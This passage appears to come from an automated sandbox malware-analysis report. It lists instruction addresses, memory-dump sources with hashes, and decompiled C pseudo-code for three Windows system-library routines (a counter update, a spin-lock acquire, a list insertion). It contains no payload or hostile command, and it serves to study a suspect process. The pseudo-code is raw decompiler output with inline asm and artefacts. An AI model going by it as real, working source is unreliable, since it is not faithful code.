					}
				}
			}



















                                                                                                                                                    0x0318ae44
                                                                                                                                                    0x0318ae4c
                                                                                                                                                    0x0318ae53
                                                                                                                                                    0x0318ae55
                                                                                                                                                    0x0318ae5c
                                                                                                                                                    0x0318ae64
                                                                                                                                                    0x0318ae68
                                                                                                                                                    0x0318ae75
                                                                                                                                                    0x0318ae75
                                                                                                                                                    0x0318ae78
                                                                                                                                                    0x0318ae7a
                                                                                                                                                    0x0318ae7c
                                                                                                                                                    0x0318ae7f
                                                                                                                                                    0x0318aea8
                                                                                                                                                    0x0318aeab
                                                                                                                                                    0x0318aead
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318aeb3
                                                                                                                                                    0x0318aeb8
                                                                                                                                                    0x0318aebb
                                                                                                                                                    0x0318aebd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318ae81
                                                                                                                                                    0x0318ae88
                                                                                                                                                    0x0318ae8f
                                                                                                                                                    0x0318ae9b
                                                                                                                                                    0x0318ae96
                                                                                                                                                    0x0318ae96
                                                                                                                                                    0x0318ae96
                                                                                                                                                    0x0318aea0
                                                                                                                                                    0x0318aea3
                                                                                                                                                    0x0318aebf
                                                                                                                                                    0x0318aebf
                                                                                                                                                    0x0318aec3
                                                                                                                                                    0x0318aec9
                                                                                                                                                    0x0318af0d
                                                                                                                                                    0x0318af14
                                                                                                                                                    0x0318af3d
                                                                                                                                                    0x0318af3d
                                                                                                                                                    0x0318af41
                                                                                                                                                    0x0318af44
                                                                                                                                                    0x0318af67
                                                                                                                                                    0x0318af67
                                                                                                                                                    0x0318af6a
                                                                                                                                                    0x0318afca
                                                                                                                                                    0x0318afd1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318afd1
                                                                                                                                                    0x0318af6c
                                                                                                                                                    0x0318af6d
                                                                                                                                                    0x0318af75
                                                                                                                                                    0x0318af7c
                                                                                                                                                    0x0318af7e
                                                                                                                                                    0x0318af80
                                                                                                                                                    0x0318af85
                                                                                                                                                    0x0318af87
                                                                                                                                                    0x0318af99
                                                                                                                                                    0x0318af89
                                                                                                                                                    0x0318af92
                                                                                                                                                    0x0318af92
                                                                                                                                                    0x0318af9e
                                                                                                                                                    0x0318afa1
                                                                                                                                                    0x0318afa3
                                                                                                                                                    0x0318afa9
                                                                                                                                                    0x0318afb0
                                                                                                                                                    0x0318afb2
                                                                                                                                                    0x0318afb4
                                                                                                                                                    0x0318afbc
                                                                                                                                                    0x0318afbc
                                                                                                                                                    0x0318afb4
                                                                                                                                                    0x0318afb0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318afa1
                                                                                                                                                    0x0318af4f
                                                                                                                                                    0x0318af57
                                                                                                                                                    0x0318af5c
                                                                                                                                                    0x0318af5e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318af60
                                                                                                                                                    0x0318af64
                                                                                                                                                    0x0318af64
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318af64
                                                                                                                                                    0x0318af1a
                                                                                                                                                    0x0318af25
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318af27
                                                                                                                                                    0x0318af28
                                                                                                                                                    0x0318af33
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318aed0
                                                                                                                                                    0x0318aed0
                                                                                                                                                    0x0318aed2
                                                                                                                                                    0x0318aee1
                                                                                                                                                    0x0318aee4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318aee6
                                                                                                                                                    0x0318aeec
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318aefb
                                                                                                                                                    0x0318af07
                                                                                                                                                    0x0318afd3
                                                                                                                                                    0x0318afdb
                                                                                                                                                    0x0318afdb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318af07
                                                                                                                                                    0x0318aed6
                                                                                                                                                    0x0318aed8
                                                                                                                                                    0x0318aedf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318aedf
                                                                                                                                                    0x0318aec9

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 831b181a3f2fb327ab9281de74b10b304f248dd1f8d7be4ea7c393ddac602d65
                                                                                                                                                    • Instruction ID: d5346266742ab65cc5f1aa55c40cd031c7bc4580f94f59c182d5686e5591f5ea
                                                                                                                                                    • Opcode Fuzzy Hash: 831b181a3f2fb327ab9281de74b10b304f248dd1f8d7be4ea7c393ddac602d65
                                                                                                                                                    • Instruction Fuzzy Hash: 4D41F6B17007119BD729EB29C894B7FF799EF8C610F08461AF8568B290D774D851CEA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EDBE9, Relevance: .1, Instructions: 149COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E030EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E030CCC50(E030C4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E030E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E03198ED6(_t102, _t98);
						}
						_t76 = _v44;
						E030E2280(_t58, _v44);
						E030EDD82(_v44, _t102, _t98);
						E030EB944(_t102, _v5);
						return E030DFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x31b8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x31b862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x31b8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x31b862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x318fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                                                                                    0x030edbe9
                                                                                                                                                    0x030edbf2
                                                                                                                                                    0x030edbf7
                                                                                                                                                    0x030edbf9
                                                                                                                                                    0x030edbfc
                                                                                                                                                    0x030edc00
                                                                                                                                                    0x030edc03
                                                                                                                                                    0x030edc14
                                                                                                                                                    0x030edd54
                                                                                                                                                    0x030edd54
                                                                                                                                                    0x030edd54
                                                                                                                                                    0x030edc18
                                                                                                                                                    0x030edc1d
                                                                                                                                                    0x030edc1d
                                                                                                                                                    0x030edc32
                                                                                                                                                    0x030edc3b
                                                                                                                                                    0x030edc3e
                                                                                                                                                    0x030edc46
                                                                                                                                                    0x030edd5b
                                                                                                                                                    0x030edd62
                                                                                                                                                    0x030edd64
                                                                                                                                                    0x030edd67
                                                                                                                                                    0x030edd69
                                                                                                                                                    0x030edd6b
                                                                                                                                                    0x030edd6e
                                                                                                                                                    0x030edd70
                                                                                                                                                    0x030edd73
                                                                                                                                                    0x030edd73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030edc4c
                                                                                                                                                    0x030edc4e
                                                                                                                                                    0x03133ae3
                                                                                                                                                    0x03133ae8
                                                                                                                                                    0x03133aea
                                                                                                                                                    0x030edce7
                                                                                                                                                    0x030edce9
                                                                                                                                                    0x030edcec
                                                                                                                                                    0x030edcee
                                                                                                                                                    0x030edcf0
                                                                                                                                                    0x030edcf3
                                                                                                                                                    0x030edcf5
                                                                                                                                                    0x03133af2
                                                                                                                                                    0x03133af5
                                                                                                                                                    0x03133af5
                                                                                                                                                    0x030edd06
                                                                                                                                                    0x030edd08
                                                                                                                                                    0x030edd0b
                                                                                                                                                    0x030edd12
                                                                                                                                                    0x03133b08
                                                                                                                                                    0x030edd18
                                                                                                                                                    0x030edd18
                                                                                                                                                    0x030edd18
                                                                                                                                                    0x030edd20
                                                                                                                                                    0x030edd23
                                                                                                                                                    0x03133b16
                                                                                                                                                    0x03133b16
                                                                                                                                                    0x030edd29
                                                                                                                                                    0x030edd2d
                                                                                                                                                    0x030edd36
                                                                                                                                                    0x030edd40
                                                                                                                                                    0x030edd51
                                                                                                                                                    0x030edd51
                                                                                                                                                    0x030edc54
                                                                                                                                                    0x030edc59
                                                                                                                                                    0x030edc59
                                                                                                                                                    0x030edc5e
                                                                                                                                                    0x030edc5e
                                                                                                                                                    0x030edc63
                                                                                                                                                    0x030edc66
                                                                                                                                                    0x030edc6b
                                                                                                                                                    0x030edc78
                                                                                                                                                    0x030edc7b
                                                                                                                                                    0x030edc81
                                                                                                                                                    0x030edc81
                                                                                                                                                    0x030edc83
                                                                                                                                                    0x030edc89
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030edd7b
                                                                                                                                                    0x030edd7b
                                                                                                                                                    0x030edc8f
                                                                                                                                                    0x030edc8f
                                                                                                                                                    0x030edc92
                                                                                                                                                    0x030edc99
                                                                                                                                                    0x030edc9f
                                                                                                                                                    0x030edca5
                                                                                                                                                    0x030edcaa
                                                                                                                                                    0x030edcaa
                                                                                                                                                    0x030edcb3
                                                                                                                                                    0x030edcb8
                                                                                                                                                    0x030edcbb
                                                                                                                                                    0x030edcc1
                                                                                                                                                    0x030edccf
                                                                                                                                                    0x030edcd2
                                                                                                                                                    0x030edcd5
                                                                                                                                                    0x030edcd7
                                                                                                                                                    0x030edcda
                                                                                                                                                    0x030edcdc
                                                                                                                                                    0x030edcdc
                                                                                                                                                    0x030edce2
                                                                                                                                                    0x030edce4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030edce4

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1dcc5a0f41520db05a88be482cc36635d8a36ebed8e1b16f958e538c59354d58
                                                                                                                                                    • Instruction ID: 2e04ec8118e23c1d78119e08d66e918614c82ab6efc688bf4b71511369d2afe7
                                                                                                                                                    • Opcode Fuzzy Hash: 1dcc5a0f41520db05a88be482cc36635d8a36ebed8e1b16f958e538c59354d58
                                                                                                                                                    • Instruction Fuzzy Hash: BA51BD75B06256CFCB14CFA8C490AAEFBF5FB88350F24859AD555AB340EB30A944CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030DEF40, Relevance: .1, Instructions: 147COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E030DEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E030C9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E030C2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                                                                                    0x030def4b
                                                                                                                                                    0x030def4d
                                                                                                                                                    0x030def57
                                                                                                                                                    0x030df0bd
                                                                                                                                                    0x030df0c2
                                                                                                                                                    0x030df0d2
                                                                                                                                                    0x030df0d2
                                                                                                                                                    0x030df0c2
                                                                                                                                                    0x030def5d
                                                                                                                                                    0x030def5f
                                                                                                                                                    0x030def67
                                                                                                                                                    0x030def6a
                                                                                                                                                    0x030def6d
                                                                                                                                                    0x030def74
                                                                                                                                                    0x030def7f
                                                                                                                                                    0x030def82
                                                                                                                                                    0x030def82
                                                                                                                                                    0x030def86
                                                                                                                                                    0x030def88
                                                                                                                                                    0x030def8c
                                                                                                                                                    0x030def8f
                                                                                                                                                    0x030def8f
                                                                                                                                                    0x030def8f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030def91
                                                                                                                                                    0x030def93
                                                                                                                                                    0x030defc4
                                                                                                                                                    0x030defc4
                                                                                                                                                    0x030defc4
                                                                                                                                                    0x030defca
                                                                                                                                                    0x030defd0
                                                                                                                                                    0x030df0a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030df0af
                                                                                                                                                    0x0312bb06
                                                                                                                                                    0x0312bb0a
                                                                                                                                                    0x030df0b5
                                                                                                                                                    0x030df0b5
                                                                                                                                                    0x030df0b5
                                                                                                                                                    0x030df0b5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030defd6
                                                                                                                                                    0x030defd9
                                                                                                                                                    0x030df0de
                                                                                                                                                    0x030df0e2
                                                                                                                                                    0x030defdf
                                                                                                                                                    0x030defdf
                                                                                                                                                    0x030defdf
                                                                                                                                                    0x030defe5
                                                                                                                                                    0x0312bafc
                                                                                                                                                    0x0312bafc
                                                                                                                                                    0x030defe5
                                                                                                                                                    0x030defeb
                                                                                                                                                    0x030defed
                                                                                                                                                    0x030df00f
                                                                                                                                                    0x030df011
                                                                                                                                                    0x030df01a
                                                                                                                                                    0x030df01d
                                                                                                                                                    0x030df021
                                                                                                                                                    0x030df028
                                                                                                                                                    0x030df029
                                                                                                                                                    0x030df029
                                                                                                                                                    0x030df02c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030df02c
                                                                                                                                                    0x030deff3
                                                                                                                                                    0x030deff9
                                                                                                                                                    0x030df0ea
                                                                                                                                                    0x030df0ed
                                                                                                                                                    0x030df0ef
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030df0ef
                                                                                                                                                    0x030df003
                                                                                                                                                    0x0312bb12
                                                                                                                                                    0x030df045
                                                                                                                                                    0x030df049
                                                                                                                                                    0x030df051
                                                                                                                                                    0x030df09e
                                                                                                                                                    0x030df0a0
                                                                                                                                                    0x030df0a0
                                                                                                                                                    0x030df09e
                                                                                                                                                    0x030df053
                                                                                                                                                    0x030df064
                                                                                                                                                    0x030df064
                                                                                                                                                    0x030df06b
                                                                                                                                                    0x0312bb1a
                                                                                                                                                    0x0312bb1a
                                                                                                                                                    0x030df071
                                                                                                                                                    0x030df071
                                                                                                                                                    0x030df07d
                                                                                                                                                    0x030df082
                                                                                                                                                    0x030df08f
                                                                                                                                                    0x030df08f
                                                                                                                                                    0x030df009
                                                                                                                                                    0x030df00d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030df00d
                                                                                                                                                    0x030defd0
                                                                                                                                                    0x030def97
                                                                                                                                                    0x030defa5
                                                                                                                                                    0x030defaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030defac
                                                                                                                                                    0x030defac
                                                                                                                                                    0x030defac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030defb2
                                                                                                                                                    0x030df036
                                                                                                                                                    0x030df03a
                                                                                                                                                    0x030df040
                                                                                                                                                    0x030df090
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030df092
                                                                                                                                                    0x030df042
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030df042
                                                                                                                                                    0x030defb7
                                                                                                                                                    0x030defb9
                                                                                                                                                    0x030defbc
                                                                                                                                                    0x030defb0
                                                                                                                                                    0x030defb0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030defbe
                                                                                                                                                    0x030defbe
                                                                                                                                                    0x030defc1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030defc1
                                                                                                                                                    0x030defbc
                                                                                                                                                    0x030defaa
                                                                                                                                                    0x030def91

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                                    • Instruction ID: ea1a5dc07c6df4a0133d828a75abb5747c923a314b989fc2e295417824a872c9
                                                                                                                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                                    • Instruction Fuzzy Hash: D351C030A0634AAFDB24CB68D1D47AEFFF1AF45314F1CC1A8D4569B281C375A989CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0319740D, Relevance: .1, Instructions: 141COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			E0319740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0311D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0310F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L030E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L030E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0310F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L030E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                                                                                    0x0319740d
                                                                                                                                                    0x0319740d
                                                                                                                                                    0x03197412
                                                                                                                                                    0x03197413
                                                                                                                                                    0x03197416
                                                                                                                                                    0x03197418
                                                                                                                                                    0x0319741c
                                                                                                                                                    0x0319741f
                                                                                                                                                    0x03197422
                                                                                                                                                    0x03197422
                                                                                                                                                    0x03197428
                                                                                                                                                    0x0319742a
                                                                                                                                                    0x0319742a
                                                                                                                                                    0x03197451
                                                                                                                                                    0x03197432
                                                                                                                                                    0x0319744f
                                                                                                                                                    0x0319744f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03197434
                                                                                                                                                    0x03197438
                                                                                                                                                    0x03197443
                                                                                                                                                    0x03197517
                                                                                                                                                    0x03197517
                                                                                                                                                    0x0319751a
                                                                                                                                                    0x03197535
                                                                                                                                                    0x03197520
                                                                                                                                                    0x03197527
                                                                                                                                                    0x0319752c
                                                                                                                                                    0x03197531
                                                                                                                                                    0x03197533
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03197533
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03197531
                                                                                                                                                    0x0319754b
                                                                                                                                                    0x0319754f
                                                                                                                                                    0x0319755c
                                                                                                                                                    0x0319755c
                                                                                                                                                    0x0319755f
                                                                                                                                                    0x03197560
                                                                                                                                                    0x03197561
                                                                                                                                                    0x03197562
                                                                                                                                                    0x03197563
                                                                                                                                                    0x03197568
                                                                                                                                                    0x0319756a
                                                                                                                                                    0x0319756c
                                                                                                                                                    0x0319756d
                                                                                                                                                    0x0319756d
                                                                                                                                                    0x0319756f
                                                                                                                                                    0x03197572
                                                                                                                                                    0x03197574
                                                                                                                                                    0x03197577
                                                                                                                                                    0x0319757c
                                                                                                                                                    0x0319757f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03197551
                                                                                                                                                    0x03197551
                                                                                                                                                    0x03197551
                                                                                                                                                    0x03197553
                                                                                                                                                    0x03197553
                                                                                                                                                    0x03197449
                                                                                                                                                    0x03197449
                                                                                                                                                    0x0319744c
                                                                                                                                                    0x0319744c
